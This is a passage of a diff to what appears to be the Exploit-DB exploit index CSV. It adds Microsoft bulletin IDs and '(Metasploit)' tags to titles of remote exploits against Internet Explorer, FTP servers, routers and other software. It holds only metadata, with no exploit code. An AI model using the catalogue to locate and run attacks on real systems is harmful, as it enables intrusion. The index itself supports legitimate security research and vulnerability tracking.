Redirect File Disclosure",2002-08-23,"GreyMagic Software",windows,remote,0 -21750,platforms/windows/remote/21750.txt,"Microsoft Internet Explorer 5 - Dialog Same Origin Policy Bypass Variant",2002-04-16,"GreyMagic Software",windows,remote,0 +21750,platforms/windows/remote/21750.txt,"Microsoft Internet Explorer 5 - Dialog Same Origin Policy Bypass Variant (MS02-047)",2002-04-16,"GreyMagic Software",windows,remote,0 21751,platforms/multiple/remote/21751.txt,"Blazix 1.2 - Special Character Handling Server Side Script Information Disclosure",2002-08-24,"Auriemma Luigi",multiple,remote,0 21752,platforms/multiple/remote/21752.txt,"Blazix 1.2 - Password Protected Directory Information Disclosure",2002-08-25,"Auriemma Luigi",multiple,remote,0 21753,platforms/windows/remote/21753.txt,"OmniHTTPd 1.1/2.0.x/2.4 - test.php Sample Application Cross-Site Scripting",2002-08-26,"Matthew Murphy",windows,remote,0 @@ -12242,7 +12251,7 @@ id,file,description,date,author,platform,type,port 21837,platforms/windows/remote/21837.rb,"InduSoft Web Studio - Arbitrary File Upload / Remote Code Execution (Metasploit)",2012-10-10,Metasploit,windows,remote,4322 21838,platforms/windows/remote/21838.rb,"Avaya WinPMD UniteHostRouter - Buffer Overflow (Metasploit)",2012-10-10,Metasploit,windows,remote,3217 21839,platforms/windows/remote/21839.rb,"NTR - ActiveX Control StopModule() Remote Code Execution (Metasploit)",2012-10-10,Metasploit,windows,remote,0 -21840,platforms/windows/remote/21840.rb,"Microsoft Internet Explorer - execCommand Use-After-Free (MS12-063)",2012-10-10,Metasploit,windows,remote,0 +21840,platforms/windows/remote/21840.rb,"Microsoft Internet Explorer - execCommand Use-After-Free (MS12-063) (Metasploit)",2012-10-10,Metasploit,windows,remote,0 21841,platforms/windows/remote/21841.rb,"NTR - ActiveX Control Check() Method Buffer Overflow (Metasploit)",2012-10-10,Metasploit,windows,remote,0 21842,platforms/windows/remote/21842.rb,"HP Application Lifecycle Management - XGO.ocx ActiveX SetShapeNodeType() Remote Code Execution (Metasploit)",2012-10-10,Metasploit,windows,remote,0 21846,platforms/java/remote/21846.rb,"Oracle Business Transaction Management FlashTunnelService - Remote Code Execution (Metasploit)",2012-10-10,Metasploit,java,remote,7001 @@ -12586,7 +12595,7 @@ id,file,description,date,author,platform,type,port 23114,platforms/windows/remote/23114.txt,"Microsoft Internet Explorer 5/6 - Browser Popup Window Object Type Validation",2003-09-07,http-equiv,windows,remote,0 23115,platforms/linux/remote/23115.c,"Mah-Jong 1.4 - Client/Server Remote sscanf() Buffer Overflow",2003-09-07,V9,linux,remote,0 23121,platforms/windows/remote/23121.txt,"Kukol E.V. HTTP & FTP Server Suite 6.2 - File Disclosure",2003-09-08,euronymous,windows,remote,0 -23122,platforms/windows/remote/23122.txt,"Microsoft Internet Explorer 5 - XML Page Object Type Validation",2003-09-08,http-equiv,windows,remote,0 +23122,platforms/windows/remote/23122.txt,"Microsoft Internet Explorer 5 - XML Page Object Type Validation (MS03-040)",2003-09-08,http-equiv,windows,remote,0 23123,platforms/windows/remote/23123.pl,"Roger Wilco 1.4.1 - Remote Server Side Buffer Overrun",2003-09-08,D4rkGr3y,windows,remote,0 23131,platforms/windows/remote/23131.txt,"Microsoft Internet Explorer 6 - Script Execution Vulnerabilities",2003-09-10,"Liu Die Yu and Jelmer",windows,remote,0 23224,platforms/multiple/remote/23224.rb,"Splunk 5.0 - Custom App Remote Code Execution (Metasploit)",2012-12-09,Metasploit,multiple,remote,0 @@ -12631,7 +12640,7 @@ id,file,description,date,author,platform,type,port 23229,platforms/windows/remote/23229.cpp,"Microsoft Windows XP/2000/2003 - Message Queuing Service Heap Overflow",2003-10-07,DaveK,windows,remote,0 23230,platforms/multiple/remote/23230.txt,"Adobe SVG Viewer 3.0 - postURL/getURL Restriction Bypass",2003-10-07,"GreyMagic Software",multiple,remote,0 23243,platforms/windows/remote/23243.py,"Freefloat FTP Server - 'USER' Command Buffer Overflow",2012-12-09,D35m0nd142,windows,remote,0 -23247,platforms/windows/remote/23247.c,"Microsoft Windows XP/2000 - Messenger Service Buffer Overrun",2003-10-25,Adik,windows,remote,0 +23247,platforms/windows/remote/23247.c,"Microsoft Windows XP/2000 - Messenger Service Buffer Overrun (MS03-043)",2003-10-25,Adik,windows,remote,0 23404,platforms/multiple/remote/23404.c,"Applied Watch Command Center 1.0 - Authentication Bypass (1)",2003-11-28,"Bugtraq Security",multiple,remote,0 23257,platforms/multiple/remote/23257.txt,"Bajie HTTP Server 0.95 - Example Scripts And Servlets Cross-Site Scripting",2003-10-16,"Oliver Karow",multiple,remote,0 23265,platforms/windows/remote/23265.txt,"Sun Java Plugin 1.4.2 _01 - Cross-Site Applet Sandbox Security Model Violation",2003-10-20,"Marc Schoenefeld",windows,remote,0 @@ -12705,7 +12714,7 @@ id,file,description,date,author,platform,type,port 23491,platforms/windows/remote/23491.pl,"Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Based Buffer Overrun (1)",2003-12-29,fiNis,windows,remote,0 23492,platforms/windows/remote/23492.c,"Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Based Buffer Overrun (2)",2003-12-29,D4rkGr3y,windows,remote,0 23493,platforms/windows/remote/23493.txt,"Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Based Buffer Overrun (3)",2003-12-29,"Luigi Auriemma",windows,remote,0 -23695,platforms/windows/remote/23695.txt,"Microsoft Internet Explorer 5.0.1 - ITS Protocol Zone Bypass",2004-02-13,anonymous,windows,remote,0 +23695,platforms/windows/remote/23695.txt,"Microsoft Internet Explorer 5.0.1 - ITS Protocol Zone Bypass (MS04-013)",2004-02-13,anonymous,windows,remote,0 23500,platforms/windows/remote/23500.rb,"InduSoft Web Studio - ISSymbol.ocx InternationalSeparator() Heap Overflow (Metasploit)",2012-12-20,Metasploit,windows,remote,0 23502,platforms/windows/remote/23502.c,"Alt-N MDaemon 6.x/WorldClient - Form2Raw Raw Message Handler Buffer Overflow (2)",2003-12-29,"Rosiello Security",windows,remote,0 23503,platforms/windows/remote/23503.txt,"NETObserve 2.0 - Authentication Bypass",2003-12-29,"Peter Winter-Smith",windows,remote,0 @@ -12757,7 +12766,7 @@ id,file,description,date,author,platform,type,port 23608,platforms/windows/remote/23608.pl,"InternetNow ProxyNow 2.6/2.75 - Multiple Stack and Heap Overflow Vulnerabilities",2004-01-26,"Peter Winter-Smith",windows,remote,0 23612,platforms/windows/remote/23612.txt,"BRS Webweaver 1.0.7 - 'ISAPISkeleton.dll' Cross-Site Scripting",2004-01-28,"Oliver Karow",windows,remote,0 23632,platforms/windows/remote/23632.txt,"Crob FTP Server 3.5.1 - Remote Information Disclosure",2004-02-02,"Zero X",windows,remote,0 -23643,platforms/windows/remote/23643.txt,"Microsoft Internet Explorer 5 - NavigateAndFind() Cross-Zone Policy",2004-02-03,"Andreas Sandblad",windows,remote,0 +23643,platforms/windows/remote/23643.txt,"Microsoft Internet Explorer 5 - NavigateAndFind() Cross-Zone Policy (MS04-004)",2004-02-03,"Andreas Sandblad",windows,remote,0 23649,platforms/windows/remote/23649.rb,"Microsoft SQL Server - Database Link Crawling Command Execution (Metasploit)",2012-12-25,Metasploit,windows,remote,0 23650,platforms/windows/remote/23650.rb,"IBM Lotus Notes Client URL Handler - Command Injection (Metasploit)",2012-12-25,Metasploit,windows,remote,0 23651,platforms/php/remote/23651.rb,"WordPress Plugin WP-Property - Arbitrary .PHP File Upload (Metasploit)",2012-12-25,Metasploit,php,remote,0 @@ -12832,7 +12841,7 @@ id,file,description,date,author,platform,type,port 24017,platforms/windows/remote/24017.html,"Microsoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP Bypass) (MS12-037)",2013-01-10,sickness,windows,remote,0 24018,platforms/php/remote/24018.rb,"eXtplorer 2.1 - Arbitrary File Upload (Metasploit)",2013-01-10,Metasploit,php,remote,0 24019,platforms/multiple/remote/24019.rb,"Ruby on Rails - XML Processor YAML Deserialization Code Execution (Metasploit)",2013-01-10,Metasploit,multiple,remote,0 -24020,platforms/windows/remote/24020.rb,"Microsoft Internet Explorer - Option Element Use-After-Free (Metasploit)",2013-01-10,Metasploit,windows,remote,0 +24020,platforms/windows/remote/24020.rb,"Microsoft Internet Explorer - Option Element Use-After-Free (MS11-081) (Metasploit)",2013-01-10,Metasploit,windows,remote,0 24021,platforms/windows/remote/24021.rb,"Honeywell Tema Remote Installer - ActiveX Remote Code Execution (Metasploit)",2013-01-10,Metasploit,windows,remote,0 24024,platforms/windows/remote/24024.html,"Softwin BitDefender - AvxScanOnlineCtrl COM Object Arbitrary File Upload / Execution",2004-04-19,"Rafel Ivgi The-Insider",windows,remote,0 24025,platforms/windows/remote/24025.txt,"Softwin BitDefender - AvxScanOnlineCtrl COM Object Information Disclosure",2004-04-19,"Rafel Ivgi The-Insider",windows,remote,0 @@ -12844,7 +12853,7 @@ id,file,description,date,author,platform,type,port 24038,platforms/linux/remote/24038.txt,"Xine 0.9.x and Xine-Lib 1 - Multiple Remote File Overwrite Vulnerabilities",2004-04-22,anonymous,linux,remote,0 24040,platforms/multiple/remote/24040.txt,"PISG 0.54 - IRC Nick HTML Injection",2004-04-22,shr3kst3r,multiple,remote,0 24041,platforms/multiple/remote/24041.c,"Epic Games Unreal Tournament Engine 3 - UMOD Manifest.INI Arbitrary File Overwrite",2004-04-22,"Luigi Auriemma",multiple,remote,0 -24045,platforms/java/remote/24045.rb,"Java Applet JMX - Remote Code Execution (1)",2013-01-11,Metasploit,java,remote,0 +24045,platforms/java/remote/24045.rb,"Java Applet JMX - Remote Code Execution (Metasploit) (1)",2013-01-11,Metasploit,java,remote,0 24065,platforms/hardware/remote/24065.java,"Siemens S55 - Cellular Telephone Sms Confirmation Message Bypass",2004-04-27,FtR,hardware,remote,0 24067,platforms/unix/remote/24067.c,"LHA 1.x - Buffer Overflow / Directory Traversal",2004-04-30,N4rK07IX,unix,remote,0 24069,platforms/windows/remote/24069.html,"Microsoft Internet Explorer 6 - Meta Data Foreign Domain Spoofing",2004-04-30,E.Kellinis,windows,remote,0 @@ -12924,7 +12933,7 @@ id,file,description,date,author,platform,type,port 24326,platforms/cgi/remote/24326.txt,"RiSearch 0.99 /RiSearch Pro 3.2.6 - show.pl Open Proxy Relay",2004-07-27,"Phil Robinson",cgi,remote,0 24327,platforms/cgi/remote/24327.txt,"RiSearch 0.99 /RiSearch Pro 3.2.6 - show.pl Arbitrary File Access",2004-07-27,"Phil Robinson",cgi,remote,0 24328,platforms/windows/remote/24328.txt,"Microsoft Internet Explorer 5.0.1 - Style Tag Comment Memory Corruption",2004-07-08,"Phuong Nguyen",windows,remote,0 -24336,platforms/cgi/remote/24336.txt,"myServer 0.6.2 - math_sum.mscgi Multiple Parameter Cross-Site Scripting",2004-07-30,dr_insane,cgi,remote,0 +24336,platforms/cgi/remote/24336.txt,"MyServer 0.6.2 - math_sum.mscgi Multiple Parameter Cross-Site Scripting",2004-07-30,dr_insane,cgi,remote,0 24337,platforms/cgi/remote/24337.txt,"myServer 0.6.2 - math_sum.mscgi Multiple Parameter Remote Overflow",2004-07-30,dr_insane,cgi,remote,0 24338,platforms/linux/remote/24338.c,"Citadel/UX 5.9/6.x - 'Username' Buffer Overflow (1)",2004-07-30,CoKi,linux,remote,0 24339,platforms/linux/remote/24339.c,"Citadel/UX 5.9/6.x - 'Username' Buffer Overflow (2)",2004-07-30,Nebunu,linux,remote,0 @@ -12945,11 +12954,11 @@ id,file,description,date,author,platform,type,port 24417,platforms/windows/remote/24417.txt,"Xedus Web Server 1.0 - test.x 'Username' Parameter Cross-Site Scripting",2004-09-30,"James Bercegay",windows,remote,0 24418,platforms/windows/remote/24418.txt,"Xedus Web Server 1.0 - testgetrequest.x 'Username' Parameter Cross-Site Scripting",2004-09-30,"James Bercegay",windows,remote,0 24419,platforms/windows/remote/24419.txt,"Xedus Web Server 1.0 - Traversal Arbitrary File Access",2004-09-30,"James Bercegay",windows,remote,0 -24460,platforms/windows/remote/24460.rb,"VMware OVF Tools - Format String (1)",2013-02-06,Metasploit,windows,remote,0 +24460,platforms/windows/remote/24460.rb,"VMware OVF Tools - Format String (Metasploit) (1)",2013-02-06,Metasploit,windows,remote,0 24434,platforms/multiple/remote/24434.rb,"Ruby on Rails - JSON Processor YAML Deserialization Code Execution (Metasploit)",2013-01-29,Metasploit,multiple,remote,0 24444,platforms/php/remote/24444.rb,"DataLife Engine - preview.php PHP Code Injection (Metasploit)",2013-02-01,Metasploit,php,remote,0 24455,platforms/unix/remote/24455.rb,"Portable UPnP SDK - unique_service_name() Remote Code Execution (Metasploit)",2013-02-05,Metasploit,unix,remote,0 -24461,platforms/windows/remote/24461.rb,"VMware OVF Tools - Format String (2)",2013-02-12,Metasploit,windows,remote,0 +24461,platforms/windows/remote/24461.rb,"VMware OVF Tools - Format String (Metasploit) (2)",2013-02-12,Metasploit,windows,remote,0 24467,platforms/windows/remote/24467.rb,"ActFax 5.01 - RAW Server Exploit (Metasploit)",2013-02-07,"Craig Freyman",windows,remote,0 24479,platforms/windows/remote/24479.py,"Freefloat FTP Server 1.0 - 'Raw' Commands Buffer Overflow",2013-02-11,superkojiman,windows,remote,0 24490,platforms/windows/remote/24490.rb,"Novell Groupwise Client - 'gwcls1.dll' ActiveX Remote Code Execution (Metasploit)",2013-02-12,Metasploit,windows,remote,0 @@ -12960,8 +12969,8 @@ id,file,description,date,author,platform,type,port 24527,platforms/windows/remote/24527.rb,"BigAnt Server 2.97 - SCH And DUPF Buffer Overflow (Metasploit)",2013-02-20,Metasploit,windows,remote,0 24528,platforms/windows/remote/24528.rb,"BigAnt Server 2.97 - DUPF Command Arbitrary File Upload (Metasploit)",2013-02-20,Metasploit,windows,remote,0 24529,platforms/php/remote/24529.rb,"OpenEMR - Arbitrary .PHP File Upload (Metasploit)",2013-02-20,Metasploit,php,remote,0 -24538,platforms/windows/remote/24538.rb,"Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009)",2013-02-23,Metasploit,windows,remote,0 -24539,platforms/multiple/remote/24539.rb,"Java Applet JMX - Remote Code Execution (2)",2013-02-25,Metasploit,multiple,remote,0 +24538,platforms/windows/remote/24538.rb,"Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit)",2013-02-23,Metasploit,windows,remote,0 +24539,platforms/multiple/remote/24539.rb,"Java Applet JMX - Remote Code Execution (Metasploit) (2)",2013-02-25,Metasploit,multiple,remote,0 24547,platforms/php/remote/24547.rb,"Kordil EDms 2.2.60rc3 - Unauthenticated Arbitrary File Upload (Metasploit)",2013-02-26,Metasploit,php,remote,0 24548,platforms/php/remote/24548.rb,"Glossword 1.8.8 < 1.8.12 - Arbitrary File Upload (Metasploit)",2013-02-26,Metasploit,php,remote,0 24549,platforms/php/remote/24549.rb,"PolarPearCMS - Arbitrary .PHP File Upload (Metasploit)",2013-02-26,Metasploit,php,remote,0 @@ -12987,7 +12996,7 @@ id,file,description,date,author,platform,type,port 24686,platforms/windows/remote/24686.txt,"Microsoft Outlook 2003 - Security Policy Bypass",2004-10-18,http-equiv,windows,remote,0 24687,platforms/windows/remote/24687.txt,"Microsoft Outlook Express 4.x/5.x/6.0 - Plaintext Email Security Policy Bypass",2004-10-18,http-equiv,windows,remote,0 24688,platforms/windows/remote/24688.pl,"best software SalesLogix 2000.0 - Multiple Vulnerabilities",2004-10-18,"Carl Livitt",windows,remote,0 -24693,platforms/windows/remote/24693.txt,"Microsoft Internet Explorer 5.x - Valid File Drag and Drop Embedded Code",2004-10-20,http-equiv,windows,remote,0 +24693,platforms/windows/remote/24693.txt,"Microsoft Internet Explorer 5.x - Valid File Drag and Drop Embedded Code (MS04-038)",2004-10-20,http-equiv,windows,remote,0 24977,platforms/linux/remote/24977.txt,"CUPS 1.1.x - HPGL File Processor Buffer Overflow",2004-12-15,"Ariel Berkman",linux,remote,0 24978,platforms/linux/remote/24978.txt,"Xine-Lib 0.9/1 - Remote Client-Side Buffer Overflow",2004-12-16,"Ariel Berkman",linux,remote,0 24701,platforms/multiple/remote/24701.txt,"OpenWFE 1.4.x - Cross-Site Scripting / Connection Proxy",2004-10-25,"Joxean Koret",multiple,remote,0 @@ -13042,7 +13051,7 @@ id,file,description,date,author,platform,type,port 24935,platforms/linux/remote/24935.rb,"MongoDB - nativeHelper.apply Remote Code Execution (Metasploit)",2013-04-08,Metasploit,linux,remote,0 24936,platforms/hardware/remote/24936.rb,"Linksys E1500/E2500 - apply.cgi Remote Command Injection (Metasploit)",2013-04-08,Metasploit,hardware,remote,0 24937,platforms/linux/remote/24937.rb,"HP System Management - Anonymous Access Code Execution (Metasploit)",2013-04-08,Metasploit,linux,remote,0 -24938,platforms/multiple/remote/24938.rb,"Novell ZENworks Configuration Management 10.2.0 - Remote Execution (2)",2013-04-08,Metasploit,multiple,remote,0 +24938,platforms/multiple/remote/24938.rb,"Novell ZENworks Configuration Management 10.2.0 - Remote Execution (Metasploit) (2)",2013-04-08,Metasploit,multiple,remote,0 24950,platforms/windows/remote/24950.pl,"KNet Web Server 1.04b - Stack Corruption Buffer Overflow",2013-04-12,Wireghoul,windows,remote,0 643,platforms/windows/remote/643.c,"Seattle Lab Mail (SLMail) 5.5 - POP3 PASS Remote Buffer Overflow",2004-12-21,"Haroon Rashid Astwat",windows,remote,0 646,platforms/windows/remote/646.c,"Seattle Lab Mail (SLMail) 5.5 - Remote Buffer Overflow",2004-12-22,"Ivan Ivanovic",windows,remote,0 @@ -13116,7 +13125,7 @@ id,file,description,date,author,platform,type,port 25129,platforms/windows/remote/25129.html,"Microsoft Internet Explorer 6 - Pop-up Window Title Bar Spoofing",2005-02-21,"bitlance winter",windows,remote,0 25132,platforms/multiple/remote/25132.txt,"Bontago Game Server 1.1 - Remote Nickname Buffer Overrun",2005-02-21,"Luigi Auriemma",multiple,remote,0 25133,platforms/multiple/remote/25133.txt,"xinkaa Web station 1.0.3 - Directory Traversal",2005-02-21,"Luigi Auriemma",multiple,remote,0 -25136,platforms/php/remote/25136.rb,"phpMyAdmin - Authenticated Remote Code Execution via preg_replace()",2013-05-01,Metasploit,php,remote,0 +25136,platforms/php/remote/25136.rb,"phpMyAdmin - 'preg_replace' Authenticated Remote Code Execution (Metasploit)",2013-05-01,Metasploit,php,remote,0 25137,platforms/php/remote/25137.rb,"WordPress Plugin W3 Total Cache - PHP Code Execution (Metasploit)",2013-05-01,Metasploit,php,remote,0 25144,platforms/windows/remote/25144.txt,"sd server 4.0.70 - Directory Traversal",2005-02-21,CorryL,windows,remote,0 25146,platforms/windows/remote/25146.txt,"OpenConnect WebConnect 6.4/6.5 - jretest.html Traversal Arbitrary File Access",2005-02-21,"Dennis Rand",windows,remote,0 @@ -13149,7 +13158,7 @@ id,file,description,date,author,platform,type,port 25365,platforms/windows/remote/25365.txt,"AN HTTPD 1.42 - Arbitrary Log Content Injection",2005-04-08,"Tan Chew Keong",windows,remote,0 25375,platforms/linux/remote/25375.pl,"KDE KMail 1.7.1 - HTML EMail Remote Email Content Spoofing",2005-04-11,"Noam Rathaus",linux,remote,0 25384,platforms/windows/remote/25384.c,"Microsoft Windows 2000/XP - Internet Protocol Validation Remote Code Execution (2)",2005-04-16,"Yuri Gushin",windows,remote,0 -25385,platforms/windows/remote/25385.cpp,"Microsoft Internet Explorer 5.0.1 - Content Advisor File Handling Buffer Overflow",2005-04-12,"Miguel Tarasc",windows,remote,0 +25385,platforms/windows/remote/25385.cpp,"Microsoft Internet Explorer 5.0.1 - Content Advisor File Handling Buffer Overflow (MS05-020)",2005-04-12,"Miguel Tarasc",windows,remote,0 25386,platforms/windows/remote/25386.txt,"Microsoft Internet Explorer 5.0.1 - DHTML Object Race Condition Memory Corruption",2005-04-12,"Berend-Jan Wever",windows,remote,0 25391,platforms/multiple/remote/25391.txt,"XAMPP - Phonebook.php Multiple Remote HTML Injection Vulnerabilities",2005-04-12,"Morning Wood",multiple,remote,0 25392,platforms/linux/remote/25392.c,"Salim Gasmi GLD (Greylisting Daemon) 1.x - Postfix Greylisting Daemon Buffer Overflow",2005-04-12,Xpl017Elz,linux,remote,0 @@ -13235,7 +13244,7 @@ id,file,description,date,author,platform,type,port 25987,platforms/hardware/remote/25987.txt,"Xpient - Cash Drawer Operation",2013-06-05,"Core Security",hardware,remote,0 25988,platforms/multiple/remote/25988.txt,"Oracle9i Application Server 9.0.2 - MOD_ORADAV Access Control",2003-02-13,"David Litchfield",multiple,remote,0 25989,platforms/windows/remote/25989.txt,"NullSoft Winamp 5.0 - Malformed ID3v2 Tag Buffer Overflow",2005-07-15,"Leon Juranic",windows,remote,0 -25999,platforms/windows/remote/25999.rb,"Microsoft Internet Explorer - textNode Use-After-Free (Metasploit)",2013-06-07,"Scott Bell",windows,remote,0 +25999,platforms/windows/remote/25999.rb,"Microsoft Internet Explorer - textNode Use-After-Free (MS13-037) (Metasploit)",2013-06-07,"Scott Bell",windows,remote,0 26002,platforms/multiple/remote/26002.txt,"Oracle Reports Server 6.0.8/9.0.x - XML File Disclosure",2005-07-19,"Alexander Kornbrust",multiple,remote,0 26003,platforms/multiple/remote/26003.txt,"Oracle Reports Server 6.0.8/9.0.x - Arbitrary File Disclosure",2005-07-19,"Alexander Kornbrust",multiple,remote,0 26004,platforms/multiple/remote/26004.txt,"Oracle Reports Server 10g 9.0.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-07-19,"Alexander Kornbrust",multiple,remote,0 @@ -13259,7 +13268,7 @@ id,file,description,date,author,platform,type,port 26152,platforms/osx/remote/26152.txt,"Apple Mac OSX 10.4 Weblog Server - Cross-Site Scripting",2005-08-15,"Donnie Werner",osx,remote,0 26167,platforms/windows/remote/26167.pl,"Microsoft Visual Studio .NET - 'msdds.dll' Remote Code Execution",2005-08-17,anonymous,windows,remote,0 26168,platforms/hardware/remote/26168.txt,"Juniper NetScreen 5.0 - VPN 'Username' Enumeration",2005-08-18,"Roy Hills",hardware,remote,0 -26175,platforms/windows/remote/26175.rb,"Microsoft Internet Explorer - COALineDashStyleArray Integer Overflow (MS13-009)",2013-06-13,Metasploit,windows,remote,0 +26175,platforms/windows/remote/26175.rb,"Microsoft Internet Explorer - COALineDashStyleArray Integer Overflow (MS13-009) (Metasploit)",2013-06-13,Metasploit,windows,remote,0 26196,platforms/windows/remote/26196.txt,"BEA WebLogic 7.0/8.1 - Administration Console Cross-Site Scripting",2005-08-24,GomoR,windows,remote,0 26198,platforms/linux/remote/26198.txt,"Astaro Security Linux 6.0 01 - HTTP CONNECT Unauthorized Access",2005-08-25,"Oliver Karow",linux,remote,0 26210,platforms/multiple/remote/26210.txt,"bfcommand & control server 1.22/2.0/2.14 manager - Multiple Vulnerabilities",2005-08-29,"Luigi Auriemma",multiple,remote,0 @@ -13327,7 +13336,7 @@ id,file,description,date,author,platform,type,port 27244,platforms/linux/remote/27244.txt,"Wimpy MP3 Player 5 - Text File Overwrite",2006-02-16,ReZEN,linux,remote,0 27271,platforms/windows/remote/27271.rb,"HP Data Protector - CMD Install Service (Metasploit)",2013-08-02,"Ben Turner",windows,remote,0 27277,platforms/windows/remote/27277.py,"PCMan FTP Server 2.07 - 'PASS' Command Buffer Overflow",2013-08-02,Ottomatik,windows,remote,0 -27528,platforms/hardware/remote/27528.rb,"D-Link Devices - Unauthenticated Remote Command Execution (2)",2013-08-12,Metasploit,hardware,remote,0 +27528,platforms/hardware/remote/27528.rb,"D-Link Devices - Unauthenticated Remote Command Execution (Metasploit) (2)",2013-08-12,Metasploit,hardware,remote,0 27293,platforms/php/remote/27293.rb,"PineApp Mail-SeCure - test_li_connection.php Arbitrary Command Execution (Metasploit)",2013-08-02,Metasploit,php,remote,7443 27294,platforms/php/remote/27294.rb,"PineApp Mail-SeCure - ldapsyncnow.php Arbitrary Command Execution (Metasploit)",2013-08-02,Metasploit,php,remote,7443 27295,platforms/unix/remote/27295.rb,"PineApp Mail-SeCure - livelog.html Arbitrary Command Execution (Metasploit)",2013-08-02,Metasploit,unix,remote,7443 @@ -13339,7 +13348,7 @@ id,file,description,date,author,platform,type,port 27397,platforms/linux/remote/27397.txt,"Apache suEXEC - Privilege Elevation / Information Disclosure",2013-08-07,kingcope,linux,remote,0 27400,platforms/windows/remote/27400.py,"HP Data Protector - Arbitrary Remote Command Execution",2013-08-07,"Alessandro Di Pinto and Claudio Moletta",windows,remote,0 27401,platforms/windows/remote/27401.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Authentication Bypass / Directory Traversal SAM Retrieval Exploit",2013-08-07,Wireghoul,windows,remote,0 -27428,platforms/hardware/remote/27428.rb,"D-Link Devices - Unauthenticated Remote Command Execution (1)",2013-08-08,Metasploit,hardware,remote,0 +27428,platforms/hardware/remote/27428.rb,"D-Link Devices - Unauthenticated Remote Command Execution (Metasploit) (1)",2013-08-08,Metasploit,hardware,remote,0 27429,platforms/windows/remote/27429.rb,"Mozilla Firefox - onreadystatechange Event DocumentViewerImpl Use-After-Free (Metasploit)",2013-08-08,Metasploit,windows,remote,0 27452,platforms/hardware/remote/27452.txt,"F5 Firepass 4100 SSL VPN - Cross-Site Scripting",2006-03-21,"ILION Research",hardware,remote,0 27508,platforms/php/remote/27508.txt,"PHP 4.x/5.x - Html_Entity_Decode() Information Disclosure",2006-03-29,Samuel,php,remote,0 @@ -13415,15 +13424,15 @@ id,file,description,date,author,platform,type,port 28007,platforms/windows/remote/28007.txt,"WinSCP 3.8.1 - URI Handler Arbitrary File Access",2006-06-12,"Jelmer Kuperus",windows,remote,0 28030,platforms/unix/remote/28030.txt,"Cisco Secure ACS 2.3 - LoginProxy.cgi Cross-Site Scripting",2006-06-15,"Thomas Liam Romanis",unix,remote,0 28081,platforms/ios/remote/28081.txt,"Apple Safari 6.0.1 for iOS 6.0 / Apple Mac OSX 10.7/8 - Heap Buffer Overflow",2013-09-04,"Vitaliy Toropov",ios,remote,0 -28082,platforms/windows/remote/28082.rb,"Microsoft Internet Explorer - CFlatMarkupPointer Use-After-Free (MS13-059)",2013-09-04,Metasploit,windows,remote,0 +28082,platforms/windows/remote/28082.rb,"Microsoft Internet Explorer - CFlatMarkupPointer Use-After-Free (MS13-059) (Metasploit)",2013-09-04,Metasploit,windows,remote,0 28083,platforms/windows/remote/28083.rb,"HP LoadRunner - lrFileIOService ActiveX WriteFileString Remote Code Execution (Metasploit)",2013-09-04,Metasploit,windows,remote,0 28118,platforms/windows/remote/28118.html,"Microsoft Internet Explorer 5.0.1 - OuterHTML redirection Handling Information Disclosure",2006-06-27,"Plebo Aesdi Nael",windows,remote,0 28170,platforms/windows/remote/28170.rb,"freeFTPd 1.0.10 - 'PASS' SEH Overflow (Metasploit)",2013-09-09,"Muhamad Fadzil Ramli",windows,remote,21 28181,platforms/linux/remote/28181.c,"AdPlug 2.0 - Multiple Remote File Buffer Overflow Vulnerabilities",2006-07-06,"Luigi Auriemma",linux,remote,0 28183,platforms/windows/remote/28183.py,"eM Client e-mail client 5.0.18025.0 - Persistent Cross-Site Scripting",2013-09-10,loneferret,windows,remote,0 28186,platforms/windows/remote/28186.c,"Kaillera 0.86 - Message Buffer Overflow",2006-07-06,"Luigi Auriemma",windows,remote,0 -28187,platforms/windows/remote/28187.rb,"Microsoft Internet Explorer - CAnchorElement Use-After-Free (MS13-055)",2013-09-10,Metasploit,windows,remote,0 -28188,platforms/windows/remote/28188.rb,"HP SiteScope - Remote Code Execution (2)",2013-09-10,Metasploit,windows,remote,8080 +28187,platforms/windows/remote/28187.rb,"Microsoft Internet Explorer - CAnchorElement Use-After-Free (MS13-055) (Metasploit)",2013-09-10,Metasploit,windows,remote,0 +28188,platforms/windows/remote/28188.rb,"HP SiteScope - Remote Code Execution (Metasploit) (2)",2013-09-10,Metasploit,windows,remote,8080 28189,platforms/windows/remote/28189.txt,"Microsoft Excel 2000-2004 - Style Handling and Repair Remote Code Execution",2006-07-06,Nanika,windows,remote,0 28198,platforms/windows/remote/28198.py,"Microsoft Office 2000/2002 - Property Code Execution",2006-07-11,anonymous,windows,remote,0 28209,platforms/multiple/remote/28209.txt,"FLV Players 8 - player.php url Parameter Cross-Site Scripting",2006-07-12,xzerox,multiple,remote,0 @@ -13460,9 +13469,9 @@ id,file,description,date,author,platform,type,port 28424,platforms/linux/remote/28424.txt,"Apache 1.3.35 / 2.0.58 / 2.2.2 - Arbitrary HTTP Request Headers Security",2006-08-24,"Thiago Zaninotti",linux,remote,0 28438,platforms/windows/remote/28438.html,"Microsoft Internet Explorer 5.0.1 - Daxctle.OCX Spline Method Heap Buffer Overflow",2006-08-28,XSec,windows,remote,0 28450,platforms/hardware/remote/28450.py,"FiberHome Modem Router HG-110 - Authentication Bypass To Remote Change DNS Servers",2013-09-22,"Javier Perez",hardware,remote,0 -28480,platforms/windows/remote/28480.rb,"CA BrightStor ARCserve Tape Engine - 0x8A Buffer Overflow (2)",2013-09-23,Metasploit,windows,remote,6502 -28481,platforms/windows/remote/28481.rb,"Microsoft Internet Explorer - CCaret Use-After-Free (MS13-069)",2013-09-23,Metasploit,windows,remote,0 -28482,platforms/windows/remote/28482.rb,"Microsoft Windows Theme File Handling - Arbitrary Code Execution (MS13-071)",2013-09-23,Metasploit,windows,remote,0 +28480,platforms/windows/remote/28480.rb,"CA BrightStor ARCserve Tape Engine - 0x8A Buffer Overflow (Metasploit) (2)",2013-09-23,Metasploit,windows,remote,6502 +28481,platforms/windows/remote/28481.rb,"Microsoft Internet Explorer - CCaret Use-After-Free (MS13-069) (Metasploit)",2013-09-23,Metasploit,windows,remote,0 +28482,platforms/windows/remote/28482.rb,"Microsoft Windows Theme File Handling - Arbitrary Code Execution (MS13-071) (Metasploit)",2013-09-23,Metasploit,windows,remote,0 28483,platforms/php/remote/28483.rb,"GLPI - install.php Remote Command Execution 